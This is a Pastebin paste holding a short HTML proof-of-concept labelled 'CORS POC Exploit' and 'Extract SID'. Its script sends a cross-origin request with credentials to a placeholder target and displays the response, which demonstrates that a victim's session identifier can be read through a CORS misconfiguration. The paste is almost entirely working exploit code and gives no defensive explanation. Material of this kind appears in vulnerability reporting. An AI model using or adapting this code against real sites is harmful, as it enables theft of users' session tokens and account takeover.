SHARE
TWEET

Untitled

a guest Jul 6th, 2017 500 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <body>
  4. <center>
  5. <h2>CORS POC Exploit</h2>
  6. <h3>Extract SID</h3>
  7.  
  8. <div id="demo">
  9. <button type="button" onclick="cors()">Exploit</button>
  10. </div>
  11.  
  12. <script>
  13. function cors() {
  14.   var xhttp = new XMLHttpRequest();
  15.   xhttp.onreadystatechange = function() {
  16.     if (this.readyState == 4 && this.status == 200) {
  17.       document.getElementById("demo").innerHTML = alert(this.responseText);
  18.     }
  19.   };
  20.   xhttp.open("GET", "https://target.com/info/", true);
  21.   xhttp.withCredentials = true;
  22.   xhttp.send();
  23. }
  24. </script>
  25.  
  26. </body>
  27. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top